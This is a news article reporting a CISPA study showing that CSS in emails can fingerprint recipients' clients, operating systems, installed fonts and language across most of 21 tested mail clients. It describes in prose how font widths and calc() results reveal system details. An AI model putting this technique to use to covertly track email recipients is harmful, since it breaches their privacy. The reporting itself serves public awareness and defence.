Collecting Spy Sheets: CSS allows user tracking in emails

Users can be tracked in their emails using CSS. Similar to usage data on the web, senders of emails can collect data and thus draw conclusions about the system used. This is shown by a study conducted by the CISPA Helmholtz Center for Information Security. The browser or mail client, the operating system and other installed programs can be identified in the data. The system language is also visible via CSS tracking.

Text-based emails protect against CSS tracking

The researchers examined 21 email programs. They looked at desktop and web clients as well as apps for Android and iOS. They used various techniques to try and obtain data via the CSS. In 18 cases, at least one method was successful, including Outlook, Thunderbird and Gmail. With these programs, it is possible to identify all email addresses from an email client or to link users' web sessions with their email accounts, explains Leon Trampert, who was involved in the study. CSS tracking can only be prevented with text-based emails that do not use CSS. This is why Protonmail is the only client in the study that relies on obfuscation and loads all CSS content via a proxy.

On the web, JavaScript and tracking cookies are used to collect usage data and analyze individual users. They cannot be prevented from tracking by browser requests to the contrary. However, because most mail clients prevent the execution of JavaScript code, the researchers investigated the possibilities offered by CSS for tracking. To do this, they tested almost 1200 different combinations of browser and operating system. In almost 98 percent of cases, they were able to deduce system characteristics.

Fonts reveal system information

"Installed fonts are treacherous", explains Trampert. If, for example, a proprietary Microsoft font can be recognized, this indicates an existing installation of Microsoft Office. Using calculations, the scientists were able to deduce the operating system. Attackers can use this knowledge to try to exploit security gaps in the operating system or installed software and infiltrate systems.

In CSS, the researchers used properties as well as rules and functions. To test whether a font is installed, they created two containers. They assigned the font to be checked to one and a fallback to the other, each in a fixed size. If the containers are different widths, the font is installed. The calc() function delivers slightly different results under Windows 10 and 11 than Linux and macOS, so that indications of the operating system can be derived from this.

The scientists have published all the results on their institute's website.

(sfe)